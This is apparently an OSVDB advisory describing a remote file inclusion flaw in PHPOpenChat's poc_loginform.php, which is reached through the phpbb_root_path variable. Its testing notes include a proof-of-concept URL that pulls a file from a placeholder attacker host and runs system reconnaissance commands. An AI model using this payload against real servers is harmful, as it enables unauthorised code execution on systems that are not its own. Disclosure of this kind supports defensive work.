PHPOpenChat poc_loginform.php phpbb_root_path Variable Remote File Inclusion

2005-03-15T11:02:44
ID OSVDB:14807
Type osvdb
Reporter albania security clan(asc@albanianhaxorz.org)
Modified 2005-03-15T11:02:44

Description

Vulnerability Description

PHPOpenChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to poc_loginform.php not properly sanitizing user input supplied to the phpbb_root_path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

PHPOpenChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to poc_loginform.php not properly sanitizing user input supplied to the phpbb_root_path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[victim]/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://[attacker]/asc?&cmd=uname%20-a;w;id;pwd;ps

References:

Vendor URL: http://phpopenchat.org/ Security Tracker: 1013434 Secunia Advisory ID:14600 Related OSVDB ID: 14808 Related OSVDB ID: 14809 Other Advisory URL: http://www.albanianhaxorz.org/advisory/phpopenchaten.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0158.html